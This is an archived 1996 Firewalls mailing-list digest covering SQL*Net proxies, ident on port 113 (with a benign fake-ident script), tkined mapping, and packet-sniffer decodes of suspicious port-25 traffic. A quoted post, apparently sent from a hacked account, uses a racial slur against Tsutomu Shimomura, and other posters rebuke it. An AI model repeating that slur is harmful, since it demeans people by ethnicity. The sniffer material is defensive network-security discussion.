Tel +44 (0) 1276 686886  Fax +44 (0) 1276 678733

From firewalls-owner Mon Feb 12 05:24:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14777 for firewalls-outgoing; Mon, 12 Feb 1996 05:11:09 -0800 (PST)
Received: from fergie.yacc.co.uk (fergie.yacc.co.uk [193.117.221.71]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA14764 for ; Mon, 12 Feb 1996 05:10:59 -0800 (PST)
Received: (from smap@localhost) by fergie.yacc.co.uk (8.6.9/8.6.9) id NAA22503 for ; Mon, 12 Feb 1996 13:06:52 GMT
Received: from incy-wincy.yacc.co.uk(193.117.221.72) by fergie.yacc.co.uk via smap (V1.3) id sma022435; Mon Feb 12 13:06:24 1996
Received: (from news@localhost) by incy-wincy.yacc.co.uk (8.6.12/8.6.12) id NAA26386; Mon, 12 Feb 1996 13:06:49 GMT
To: firewalls@greatcircle.com
Path: chris
From: chris@yacc.co.uk (Chris Davies)
Newsgroups: yacc.mail.firewalls
Subject: Re: SQL*Net proxy?
Date: 12 Feb 1996 13:06:48 GMT
Organization: yacc labs, Leeds, UK
Lines: 19
Message-ID: <4fne18$p10@incy-wincy.yacc.co.uk>
References: <4f642b$ccm@incy-wincy.yacc.co.uk>
NNTP-Posting-Host: fergie.yacc.co.uk
X-Newsreader: TIN [version 1.2 PL2]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Tom Cooper (asec@access.digex.net) wrote:
: Has anyone successfully configured a proxy for outbound/inbound SQL*Net
: transactions?

I've not tested it very fully, but the TIS plug-gw appears to work for me.

: In my observations, Unix to Unix server communications take place on a
: designated port, but PC to Unix communications switch port numbers after
: about 20-25 packets.

: The PC always sends to the designated port, but the Unix server changes
: to a different port. This makes filtering difficult.

I can't say that I've seen this. I presume you're referring to SQL*Net v2?

Chris
--
yacc Labs, Leeds, UK. (tel +44 113 287-2381, email chris@yacc.co.uk)

From firewalls-owner Mon Feb 12 05:57:40 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA15508 for firewalls-outgoing; Mon, 12 Feb 1996 05:42:28 -0800 (PST)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA15492 for ; Mon, 12 Feb 1996 05:42:23 -0800 (PST)
Received: from clark.net (wbak@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id IAA00470; Mon, 12 Feb 1996 08:41:39 -0500 (EST)
Received: (from wbak@localhost) by clark.net (8.7.1/8.7.1) id IAA22571; Mon, 12 Feb 1996 08:41:38 -0500 (EST)
Date: Mon, 12 Feb 1996 08:41:38 -0500 (EST)
From: wayne bak
To: LLOYD HARTE
cc: firewalls@GreatCircle.COM
Subject: Re: RMON Data
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Connect www.desktalk.com and they will send you a demo copy of TRENDsnmp which also collects RMON data, it's a long term network
analysis tool. You can also email marci@desktalk.com. Wayne On Wed, 7 Feb 1996, LLOYD HARTE wrote: > Greetings, > > This is a little outside of a firewall question but I was wondering if any > one could point me in the direction of where I could find formulas for > analyzing RMON data. I want to calculate things like utilization, error > rates, etc. I have looked at one tool, Axon LANreporter but it only looks > at one days' worth of info and I would like to review, weeks, months, > etc. Any assistance would be great! > > LHARTE@OCEANSPRAY.COM > > From firewalls-owner Mon Feb 12 06:09:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA16145 for firewalls-outgoing; Mon, 12 Feb 1996 05:59:11 -0800 (PST) Received: from mailman.nsf.gov (mailman.nsf.gov [128.150.11.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA16140 for ; Mon, 12 Feb 1996 05:59:07 -0800 (PST) Received: from mmorse.ois.nsf.gov by mailman.nsf.gov with SMTP id AA13642 (5.65c/IDA-1.4.4 for ); Mon, 12 Feb 1996 09:00:51 -0500 Date: Mon, 12 Feb 1996 09:00:51 -0500 Message-Id: <199602121400.AA13642@mailman.nsf.gov> X-Sender: mmorse@note1.nsf.gov X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Robert Dana , firewalls@greatcircle.com From: Michael Morse Subject: Re: I want details!!! Re: NT's TCP/IP stack Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >OK, I'm getting really frustrated about the lack of details about NT's >deficiencies. I couldn't care less about OS bigotry- I'll use whatever systems >meet my needs (which often include security). I have seen, over and over >again, posts that basically say "I've personally verified that NT sucks for >{security, networking, multitasking, Internet services}. Don't believe the MS >marketing hype". 
> >For example: > >Scott Barman writes: >> Hopefully, when folks put NT on the internet, they will find the same >> thing I found through experimentation: it has multitasking that can't >> get out of its own way, it can't handle the load of a medium-low >> environment, and if something goes wrong, there isn't a quick interface >> to fix things (by passing that maze of twisty little menus all >> different!). I think you are asking too much (and too little) of Usenet (or mailing lists). The people who post here are not paid to do so, so it's unlikely they are going to take the time to perform a rigorous study and prepare a report. Nonetheless, this post you use as an example does have valuable information in it. You know that Scott feels that the performance is only appropriate for a low volume environment, and that the menu structure was non-intuitive and too lengthy for his tastes, and that this is not hearsay, that he's actually had some personal experience. Interestingly, this is the same message I've found in published reviews of NT Web servers, where the writer *was* paid, and did take the time to compare a bunch of different systems on different OS. Take all you read on the net with a very large grain of salt. Try to read between the lines. The fact that Scott hasn't said that the thing doesn't work is important information. Maybe NT would be just the thing for that low volume application you have where the sysadmin is not comfortable with command line processing. OS bigotry is not something you are likely to vanquish with Usenet postings. Better to see it for what it is, an amusing fact of life among supposedly keen analytical computer minds. Just keep it in mind when you evaluate what you read. And whatever you read, verify independently (and post the results). 
--Mike From firewalls-owner Mon Feb 12 07:24:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA18477 for firewalls-outgoing; Mon, 12 Feb 1996 07:12:41 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA18472 for ; Mon, 12 Feb 1996 07:12:37 -0800 (PST) Received: by inet1.tek.com id ; Mon, 12 Feb 1996 07:11:56 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma024342; Mon Feb 12 07:11:42 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA02889; Mon, 12 Feb 96 07:11:40 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA19501; Mon, 12 Feb 96 07:13:30 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA01236; Mon, 12 Feb 96 07:10:29 PST Date: Mon, 12 Feb 1996 07:10:28 -0800 (PST) From: Kent Dahlgren To: Brosl Hasslacher Cc: firewalls@greatcircle.COM Subject: Re: your mail In-Reply-To: <199602110124.RAA24100@azazel.sdsc.edu> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 10 Feb 1996, Brosl Hasslacher wrote: > It seems that once again, that slanty-eyed chink Tsutomu has made another > dollar at the expense of a hacker, Kevin Mitnick. > "Slanty eyed chink?" Jeez, that's a lame call. Your credibility goes down the sewer....at least in my eyes. And I'm a good ol white boy from the Pacific Northwest. Lame lame lame lame..... 
"Any ideas expressed here may not reflect those of my employers" ______________________________________________________________________________ ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ / Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com Fax: 1.503.685.3063 WWW: www.tek.com BBS: 1.503.685.4504 E-World: Keyword Tektronix HAL: 1.503.682.7450 AOL: Keyword Tektronix Service: 1.800.835.6100 FTP: ftp.tek.com ______________________________________________________________________________ From firewalls-owner Mon Feb 12 07:54:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19326 for firewalls-outgoing; Mon, 12 Feb 1996 07:51:26 -0800 (PST) Received: from diablo.ppp.de (diablo.ppp.de [193.141.101.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19299 for ; Mon, 12 Feb 1996 07:51:18 -0800 (PST) Received: from wmdhh by diablo.ppp.de with uucp (Smail3.1.28.1 #1) id m0tm0WN-0006xzC; Mon, 12 Feb 96 16:50 MET Received: from rs3.wmd.de by wmdhh with smtp (Smail3.1.26.7 #3) id m0tm0qT-0002VYC; Mon, 12 Feb 96 17:11 CET Received: by rs3.wmd.de (AIX 3.2/UCB 5.64/4.03.01) id AA23658; Mon, 12 Feb 1996 15:55:48 +0100 From: pauck@rs3.wmd.de (Marco Pauck) Message-Id: <9602121455.AA23658@rs3.wmd.de> Subject: Re: SQL*Net proxy? To: chris@yacc.co.uk (Chris Davies) Date: Mon, 12 Feb 1996 15:55:48 +0100 (MEZ) Cc: firewalls@GreatCircle.COM In-Reply-To: <4fne18$p10@incy-wincy.yacc.co.uk> from "Chris Davies" at Feb 12, 96 01:06:48 pm Reply-To: pauck@wmd.de X-Mailer: ELM [version 2.4 PL20] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Tom Cooper (asec@access.digex.net) wrote: > : Has anyone successfully configured a proxy for outbound/inbound SQL*Net > : transactions? > > I've not tested it very fully, but the TIS plug-gw appears to work for me. Me too. 
> : In my observations, Unix to Unix server communications take place on a > : designated port, but PC to Unix communications switch port numbers after > : about 20-25 packets. > > : The PC always sends to the designated port, but the Unix server changes > : to a different port. This makes filtering difficult. > > I can't say that I've seen this. I presme you're referring to > SQL*Net v2? We use plug-gw for SQL*Net v2 as well. There are possibly ways to configure V2 that plug-gw can't deal with, but with our plain-vanilla configuration it works OK. > Chris Marco -- Marco Pauck - WMD GmbH Hamburg, Germany - http://www.wmd.de/ e-mail: pauck@wmd.de, phone: +49-40-58958-120, fax: +49-40-58958-199 Life would be so much easier if we could just see the source code. From firewalls-owner Mon Feb 12 09:21:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA21829 for firewalls-outgoing; Mon, 12 Feb 1996 09:08:35 -0800 (PST) Received: from rugrat.glyphic.com (ns.glyphic.com [205.164.126.161]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA21824 for ; Mon, 12 Feb 1996 09:08:31 -0800 (PST) Received: from [205.164.126.163] by rugrat.glyphic.com with smtp (Smail3.1.29.1 #6) id m0tm1jI-000GwzC; Mon, 12 Feb 96 09:07 PST X-Sender: markl@rugrat.glyphic.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 12 Feb 1996 09:12:07 -0800 To: Ron DuFresne From: markl@glyphic.com (Mark Lentczner) Subject: Re: port 113? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk TCP port 113 is the ident service. The idea is that the Web server is asking for the account name that is associated with the TCP connection that came from your machine. At our site we felt it was a bad idea to let this information out just on general principle. Our initial technique was to just block the port in the firewall. 
This failed because some ill-behaved web servers will wait for the entire 75 seconds of TCP/IP timeout before deciding that the machine in question doesn't run ident. Only after that will it return the web page on the original connection. Makes browsing kind of slow! Note that it is unreasonable for any web server to require ident service because almost no PCs run it.

To make the response times acceptable, we had to allow the 113 packets in to those machines that didn't run ident (Macs and PCs), where the IP stacks would return ICMP "port unreachable" messages immediately, and thus get the server to give up on ident quickly and return the web page.

For machines where we wanted to run ident for internal reasons (some unix boxes) we simply used kernel packet filtering to drop external access to 113 on the floor. (This means that browsing these web sites from the unix boxes is intolerably slow, but these machines are rarely used for browsing, and there are few sites that actually seem to do this ident stuff.)

I suppose that it would be drop dead simple to write a small 'fake' ident for external access that always replied "bob". For example, the following shell script will do the trick!

#!/bin/sh
# a very simple ident server: answer every query with the fixed user "bob"
read QUERY                              # request line is "<server-port> , <client-port>"
QUERY=`echo "$QUERY" | tr -d '\r'`      # drop the CR of the CRLF line ending
echo "$QUERY : USERID : OTHER : bob"    # RFC 1413 reply: port-pair : USERID : opsys : user-id
exit 0

Question: Has anyone identified (no pun intended) the web server software that does this useless ident probe? If it is a common server, what option is needed to turn it off? 113 beyond your own secure net is useless (see the useful information the ident server above will return!) and there is no reason for any Internet web server to use it.

- Mark
-------------------
Mark Lentczner
Glyphic Technology
1209 Villa Street
Mtn. View, CA 94041
415/964-5311
markl@glyphic.com
http://www.glyphic.com/

From firewalls-owner Mon Feb 12 10:25:23 1996
Date: Mon, 12 Feb 1996 12:05:18 -0600 (CST)
From: Oliver Friedrichs
To: Kent Dahlgren
Cc: Brosl Hasslacher, firewalls@GreatCircle.COM
Subject: Re: your mail

You realize this was posted from a hacked account right?

On Mon, 12 Feb 1996, Kent Dahlgren wrote:
>
> On Sat, 10 Feb 1996, Brosl Hasslacher wrote:
>
> > It seems that once again, that slanty-eyed chink Tsutomu has made another
> > dollar at the expense of a hacker, Kevin Mitnick.
> >
>
> "Slanty eyed chink?" Jeez, that's a lame call. Your credibility goes
> down the sewer....at least in my eyes. And I'm a good ol white boy from
> the Pacific Northwest. Lame lame lame lame.....
From firewalls-owner Mon Feb 12 10:39:17 1996
Date: Mon, 12 Feb 1996 13:20:35 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: tkined and firewalls

I know the firewall companies have techies lurking on this list even though they never post (my hind brain's intuition).

What is the chance of tkined being able to produce a graphical map of a network through a firewall?

Come on techies, delurk and edificate us what is less illuminary.

Sick Puppy, Song Writer
--:: Four and twenty Girl Dawg's, came down from Inverness, ::--
--:: and when the Ball was over, their tails was all a mess, ::--
--:: forget about your father, get your head against wall, ::--
--:: if you never get sniffed on Saturday night, ::--
--:: you'll never get sniffed at all ::--

From firewalls-owner Mon Feb 12 11:24:32 1996
From: MFTemplar@aol.com
Date: Mon, 12 Feb 1996 14:17:38 -0500
Message-ID: <960212141736_142186765@emout04.mail.aol.com>
To: firewalls@greatcircle.com
Subject: Harris Computer product viability.

Hey, I was wondering what the participants in this group thought of Harris Computer's Cyberguard Firewall product. The company's information on it goes as follows:

<>

The November Data Comm Firewall test rated Harris's product # 2 (CheckPoint's was # 1) but the people at Raptor and Secure Computing say they don't run into Harris at all in the commercial market. Is there any non-governmental/commercial adoption of the Harris Computer Cyberguard product that you know of out in the field and how has it gone?
Regards,
Randy Befumo

From firewalls-owner Mon Feb 12 11:56:52 1996
Date: Mon, 12 Feb 1996 10:52:24 -0800 (PST)
From: Kent Dahlgren
To: Oliver Friedrichs
Cc: Brosl Hasslacher, firewalls@GreatCircle.COM
Subject: Re: your mail

On Mon, 12 Feb 1996, Oliver Friedrichs wrote:

> You realize this was posted from a hacked account right?

I'll bet dimes to doughnuts the prankster is reading these group postings, snickering to him or herself. Real proud. Probably one of those geeks who spend their weekends in IRC flooding people.

Has the owner of the "hacked" account replied yet?

Hey, look what I can do using an ordinary text editor like vi:

total 15576
drwx------  59 tsutomu         5120 Feb 12 09:35 .
drwxr-xr-x  26 root            1024 Feb  9 13:12 ..
-rw-------   1 tsutomu          148 Jun 15  1995 .Xauthority
-rw-------   1 tsutomu          690 Oct 19 09:13 .cshrc
-rw-------   1 tsutomu         4849 Jul 12  1995 .emacs
-rw-------   1 tsutomu          555 Jan  3 07:12 .login
drwx------   2 tsutomu         5632 Dec 27 13:07 .netscape-cache

Hell, as far as that goes, I can make it look like I hacked anyone's account:

total 15576
drwx------  59 winniethepooh   5120 Feb 12 09:35 .
drwxr-xr-x  26 root            1024 Feb  9 13:12 ..
-rw-------   1 winniethepooh    148 Jun 15  1995 .Xauthority
-rw-------   1 winniethepooh    690 Oct 19 09:13 .cshrc
-rw-------   1 winniethepooh   4849 Jul 12  1995 .emacs
-rw-------   1 winniethepooh    555 Jan  3 07:12 .login
drwx------   2 winniethepooh   5632 Dec 27 13:07 .netscape-cache

Man, this wild wacky world of hacking is really cool! Maybe I'll get chicks! Maybe I'll get a life!

From firewalls-owner Mon Feb 12 11:59:38 1996
Message-Id: <01BAF958.19AB3980@SPERFNET.cscmicro.com>
From: Shoel Perelman
To: "'firewalls@greatcircle.com'"
Subject: SHTTP/SSL Proxies?
Date: Mon, 12 Feb 1996 14:40:35 -0500

I have been using FWTK to proxy http, but now I realize that users want to access shttp pages. Are there any "free" solutions like fwtk to do this? I tried using plug-gw from fwtk to do this on port 443, but it doesn't seem to work. Has anybody successfully configured a shttp proxy? If so, what package did you use? A "net" or "free" solution is what I'm really looking for here...

Thanks in advance..

-Shoel Perelman
sdp4198@is2.nyu.edu

From firewalls-owner Mon Feb 12 12:39:46 1996
Date: Mon, 12 Feb 1996 14:00:40 -0600
To: firewalls@GreatCircle.COM
From: sengle@hti.net (Steven W. Engle)
Subject: Gauntlet 3.1 Packet Filter?
Cc: sengle@hti.net

Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny source / destination)? Or is it purely an application-level proxy services approach?

If I have IP traffic for which there is no proxy, how can I control this traffic without writing a custom proxy?

If it does packet-filter, how (well) are the proxy "rules" integrated with the packet-filtering "rules"?

I checked out the TIS web site and could not find any specific statements toward "yes, it packet filters".

--
Steve Engle
DHT, Inc.
sengle@hti.net

From firewalls-owner Mon Feb 12 12:54:22 1996
Date: Sun, 11 Feb 1996 14:10:49 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Re: Hoo Dat and sniffer log

Several people requested raw sniffer data. When I installed a sniffer as close to the target as possible and started capturing everything, instead of just the first 256 bytes of data, the sniffer started logging about 2 megabytes per minute. Sometimes very interesting stuff shows up. See corresponding CERT advisories about sniffer attacks.

To those who already asked me for sniffer code or how to set up sniffers: I am a righteous dawg appointed by Gwad and the Church of the Dead Meow to sniff and learn. Gwad didn't tell me to teach young crimmo's so I simply delete your mail.

Others: Please don't tell me these guys are trying to just send mail. They just happened to be hitting port 25 at that time.

- - - - - - - - - - - - - Frame 1454 - - - - - - - - - - - - - -
SUMMARY  Delta T   NW Util  From .        From .
1454     0.2823    0.13%    3Com 7468BE   Cisco 0A4C91   DLC Ethertype=0800, size=60 bytes
                                                         IP  D=[xxx.xxx.xxx.xxx] S=[203.241.159.180] LEN=24 ID=62335
                                                         TCP D=4126 S=25 SYN ACK=2872491522 SEQ=935105536 LEN=0 WIN=9216
DLC: ----- DLC Header -----
DLC: Frame 1454 arrived at 10:39:40.8363; frame size is 60 (003C hex) bytes.
DLC: Destination = Station 3Com 7468BE
DLC: Source      = Station Cisco 0A4C91
DLC: Ethertype   = 0800 (IP)
IP: ----- IP Header -----
IP: Version = 4, header length = 20 bytes
IP: Type of service = 00
IP:       000. .... = routine
IP:       ...0 .... = normal delay
IP:       .... 0... = normal throughput
IP:       .... .0.. = normal reliability
IP: Total length = 44 bytes
IP: Identification = 62335
IP: Flags = 4X
IP:       .1.. .... = don't fragment
IP:       ..0. .... = last fragment
IP: Fragment offset = 0 bytes
IP: Time to live = 237 seconds/hops
IP: Protocol = 6 (TCP)
IP: Header checksum = D104 (correct)
IP: Source address = [203.241.159.180], Unknown_d00d
IP: Destination address = [xxx.xxx.xxx.xxx], Clueless
IP: No options
TCP: ----- TCP header -----
TCP: Source port = 25 (SMTP)
TCP: Destination port = 4126
TCP: Initial sequence number = 935105536
TCP: Acknowledgment number = 2872491522
TCP: Data offset = 24 bytes
TCP: Flags = 12
TCP:       ..0. .... = (No urgent pointer)
TCP:       ...1 .... = Acknowledgment
TCP:       .... 0... = (No push)
TCP:       .... .0.. = (No reset)
TCP:       .... ..1. = SYN
TCP:       .... ...0 = (No FIN)
TCP: Window = 9216
TCP: Checksum = 6956 (correct)
TCP: Options follow
TCP: Maximum segment size = 512

- - - - - - - - - - - - - Frame 1455 - - - - - - - - - - - - - -
SUMMARY  Delta T   NW Util  From .        From .
1455     0.0004    0.13%    Cisco 0A4C91  3Com 7468BE    DLC Ethertype=0800, size=60 bytes
                                                         IP  D=[203.241.159.180] S=[xxx.xxx.xxx.xxx] LEN=20 ID=4051
                                                         TCP D=25 S=4126 RST WIN=0
DLC: ----- DLC Header -----
DLC: Frame 1455 arrived at 10:39:40.8368; frame size is 60 (003C hex) bytes.
DLC: Destination = Station Cisco 0A4C91
DLC: Source      = Station 3Com 7468BE
DLC: Ethertype   = 0800 (IP)
IP: ----- IP Header -----
IP: Version = 4, header length = 20 bytes
IP: Type of service = 00
IP:       000. .... = routine
IP:       ...0 .... = normal delay
IP:       .... 0... = normal throughput
IP:       .... .0.. = normal reliability
IP: Total length = 40 bytes
IP: Identification = 4051
IP: Flags = 0X
IP:       .0.. .... = may fragment
IP:       ..0. .... = last fragment
IP: Fragment offset = 0 bytes
IP: Time to live = 60 seconds/hops
IP: Protocol = 6 (TCP)
IP: Header checksum = A5B6 (correct)
IP: Source address = [xxx.xxx.xxx.xxx], Clueless
IP: Destination address = [203.241.159.180], Unknown_d00d
IP: No options
TCP: ----- TCP header -----
TCP: Source port = 4126
TCP: Destination port = 25 (SMTP)
TCP: Sequence number = 2872491522
TCP: Data offset = 20 bytes
TCP: Flags = 04
TCP:       ..0. .... = (No urgent pointer)
TCP:       ...0 .... = (No acknowledgment)
TCP:       .... 0... = (No push)
TCP:       .... .1.. = Reset
TCP:       .... ..0. = (No SYN)
TCP:       .... ...0 = (No FIN)
TCP: Window = 0
TCP: Checksum = 6D29 (correct)
TCP: No TCP options

- - - - - - - - - - - - - Frame 1493 - - - - - - - - - - - - - -
SUMMARY  Delta T   NW Util  From .        From .
1493     0.2622    0.13%    3Com 7468BE   Cisco 0A4C91   DLC Ethertype=0800, size=60 bytes
                                                         IP  D=[xxx.xxx.xxx.xxx] S=[203.241.159.180] LEN=24 ID=62336
                                                         TCP D=4126 S=25 SYN ACK=2872491522 SEQ=935809536 LEN=0 WIN=9216
DLC: ----- DLC Header -----
DLC: Frame 1493 arrived at 10:39:46.3716; frame size is 60 (003C hex) bytes.
DLC: Destination = Station 3Com 7468BE
DLC: Source      = Station Cisco 0A4C91
DLC: Ethertype   = 0800 (IP)
IP: ----- IP Header -----
IP: Version = 4, header length = 20 bytes
IP: Type of service = 00
IP:       000. .... = routine
IP:       ...0 .... = normal delay
IP:       .... 0... = normal throughput
IP:       .... .0.. = normal reliability
IP: Total length = 44 bytes
IP: Identification = 62336
IP: Flags = 4X
IP:       .1.. .... = don't fragment
IP:       ..0. .... = last fragment
IP: Fragment offset = 0 bytes
IP: Time to live = 237 seconds/hops
IP: Protocol = 6 (TCP)
IP: Header checksum = D103 (correct)
IP: Source address = [203.241.159.180], Unknown_d00d
IP: Destination address = [xxx.xxx.xxx.xxx], Clueless
IP: No options
TCP: ----- TCP header -----
TCP: Source port = 25 (SMTP)
TCP: Destination port = 4126
TCP: Initial sequence number = 935809536
TCP: Acknowledgment number = 2872491522
TCP: Data offset = 24 bytes
TCP: Flags = 12
TCP:       ..0. .... = (No urgent pointer)
TCP:       ...1 .... = Acknowledgment
TCP:       .... 0... = (No push)
TCP:       .... .0.. = (No reset)
TCP:       .... ..1. = SYN
TCP:       .... ...0 = (No FIN)
TCP: Window = 9216
TCP: Checksum = AB4B (correct)
TCP: Options follow
TCP: Maximum segment size = 512

- - - - - - - - - - - - - Frame 1494 - - - - - - - - - - - - - -
SUMMARY  Delta T   NW Util  From .        From .
1494     0.0004    0.13%    Cisco 0A4C91  3Com 7468BE    DLC Ethertype=0800, size=60 bytes
                                                         IP  D=[203.241.159.180] S=[xxx.xxx.xxx.xxx] LEN=20 ID=4072
                                                         TCP D=25 S=4126 RST WIN=0
DLC: ----- DLC Header -----
DLC: Frame 1494 arrived at 10:39:46.3720; frame size is 60 (003C hex) bytes.
DLC: Destination = Station Cisco 0A4C91
DLC: Source      = Station 3Com 7468BE
DLC: Ethertype   = 0800 (IP)
IP: ----- IP Header -----
IP: Version = 4, header length = 20 bytes
IP: Type of service = 00
IP:       000. .... = routine
IP:       ...0 .... = normal delay
IP:       .... 0... = normal throughput
IP:       .... .0.. = normal reliability
IP: Total length = 40 bytes
IP: Identification = 4072
IP: Flags = 0X
IP:       .0.. .... = may fragment
IP:       ..0. .... = last fragment
IP: Fragment offset = 0 bytes
IP: Time to live = 60 seconds/hops
IP: Protocol = 6 (TCP)
IP: Header checksum = A5A1 (correct)
IP: Source address = [xxx.xxx.xxx.xxx], Clueless
IP: Destination address = [203.241.159.180], Unknown_d00d
IP: No options
TCP: ----- TCP header -----
TCP: Source port = 4126
TCP: Destination port = 25 (SMTP)
TCP: Sequence number = 2872491522
TCP: Data offset = 20 bytes
TCP: Flags = 04
TCP:       ..0. .... = (No urgent pointer)
TCP:       ...0 .... = (No acknowledgment)
TCP:       .... 0... = (No push)
TCP:       .... .1.. = Reset
TCP:       .... ..0. = (No SYN)
TCP:       .... ...0 = (No FIN)
TCP: Window = 0
TCP: Checksum = 6D29 (correct)
TCP: No TCP options

- - - - - - - - - - - - - Frame 1517 - - - - - - - - - - - - - -
SUMMARY  Delta T   NW Util  From .        From .
1517     0.0421    0.24%    3Com 7468BE   Cisco 0A4C91   DLC Ethertype=0800, size=60 bytes
                                                         IP  D=[xxx.xxx.xxx.xxx] S=[203.241.159.180] LEN=24 ID=62337
                                                         TCP D=4126 S=25 SYN ACK=2872491522 SEQ=939073536 LEN=0 WIN=9216
DLC: ----- DLC Header -----
DLC: Frame 1517 arrived at 10:40:10.3717; frame size is 60 (003C hex) bytes.
DLC: Destination = Station 3Com 7468BE
DLC: Source      = Station Cisco 0A4C91
DLC: Ethertype   = 0800 (IP)
IP: ----- IP Header -----
IP: Version = 4, header length = 20 bytes
IP: Type of service = 00
IP:       000. .... = routine
IP:       ...0 .... = normal delay
IP:       .... 0... = normal throughput
IP:       .... .0.. = normal reliability
IP: Total length = 44 bytes
IP: Identification = 62337
IP: Flags = 4X
IP:       .1.. .... = don't fragment
IP:       ..0. .... = last fragment
IP: Fragment offset = 0 bytes
IP: Time to live = 237 seconds/hops
IP: Protocol = 6 (TCP)
IP: Header checksum = D102 (correct)
IP: Source address = [203.241.159.180], Unknown_d00d
IP: Destination address = [xxx.xxx.xxx.xxx], Clueless
IP: No options
TCP: ----- TCP header -----
TCP: Source port = 25 (SMTP)
TCP: Destination port = 4126
TCP: Initial sequence number = 939073536
TCP: Acknowledgment number = 2872491522
TCP: Data offset = 24 bytes
TCP: Flags = 12
TCP:       ..0. .... = (No urgent pointer)
TCP:       ...1 .... = Acknowledgment
TCP:       .... 0... = (No push)
TCP:       .... .0.. = (No reset)
TCP:       .... ..1. = SYN
TCP:       .... ...0 = (No FIN)
TCP: Window = 9216
TCP: Checksum = DD19 (correct)
TCP: Options follow
TCP: Maximum segment size = 512

- - - - - - - - - - - - - Frame 1518 - - - - - - - - - - - - - -
SUMMARY  Delta T   NW Util  From .        From .
1518     0.0004    0.24%    Cisco 0A4C91  3Com 7468BE    DLC Ethertype=0800, size=60 bytes
                                                         IP  D=[203.241.159.180] S=[xxx.xxx.xxx.xxx] LEN=20 ID=4102
                                                         TCP D=25 S=4126 RST WIN=0
DLC: ----- DLC Header -----
DLC: Frame 1518 arrived at 10:40:10.3721; frame size is 60 (003C hex) bytes.
DLC: Destination = Station Cisco 0A4C91
DLC: Source      = Station 3Com 7468BE
DLC: Ethertype   = 0800 (IP)
IP: ----- IP Header -----
IP: Version = 4, header length = 20 bytes
IP: Type of service = 00
IP:       000. .... = routine
IP:       ...0 .... = normal delay
IP:       .... 0... = normal throughput
IP:       .... .0.. = normal reliability
IP: Total length = 40 bytes
IP: Identification = 4102
IP: Flags = 0X
IP:       .0.. .... = may fragment
IP:       ..0. .... = last fragment
IP: Fragment offset = 0 bytes
IP: Time to live = 60 seconds/hops
IP: Protocol = 6 (TCP)
IP: Header checksum = A583 (correct)
IP: Source address = [xxx.xxx.xxx.xxx], Clueless
IP: Destination address = [203.241.159.180], Unknown_d00d
IP: No options
TCP: ----- TCP header -----
TCP: Source port = 4126
TCP: Destination port = 25 (SMTP)
TCP: Sequence number = 2872491522
TCP: Data offset = 20 bytes
TCP: Flags = 04
TCP:       ..0. .... = (No urgent pointer)
TCP:       ...0 .... = (No acknowledgment)
TCP:       .... 0... = (No push)
TCP:       .... .1.. = Reset
TCP:       .... ..0. = (No SYN)
TCP:       .... ...0 = (No FIN)
TCP: Window = 0
TCP: Checksum = 6D29 (correct)
TCP: No TCP options

From firewalls-owner Mon Feb 12 13:41:12 1996
Date: Mon, 12 Feb 1996 14:56:38 -0600 (CST)
From: Mike Neuman
Message-Id: <199602122056.OAA27620@guardian.EnGarde.com>
To: sikpuppy@maestro.com, firewalls@greatcircle.com
Subject: Re: tkined and firewalls
Reply-To: mcn@EnGarde.com
Organization: En Garde Systems--St. Louis, MO

In article you write:
>I know the firewall companies have techies lurking on this list even
>though they never post (my hind brain's intuition).
>
>What is the chance of tkined being able to produce a graphical map of a
>network through a firewall?
>
>Come on techies, delurk and edificate us what is less illuminary.

This isn't that hard of a question to answer. tkined searches for hosts by using ICMP echo requests. If you're allowing ICMP through the firewall, then it'll come up with a map, simple as that. Some of tkined's nicer mapping abilities depend upon whether you're allowing other types of ICMP packets through or are running SNMP.

-Mike
mcn@EnGarde.com

From firewalls-owner Mon Feb 12 13:43:02 1996
Message-Id: <199602122126.XAA16753@info.forthnet.gr>
Reply-to: kermit@soscorp.com
To: Shoel Perelman
cc: "'firewalls@greatcircle.com'"
Subject: Re: SHTTP/SSL Proxies?
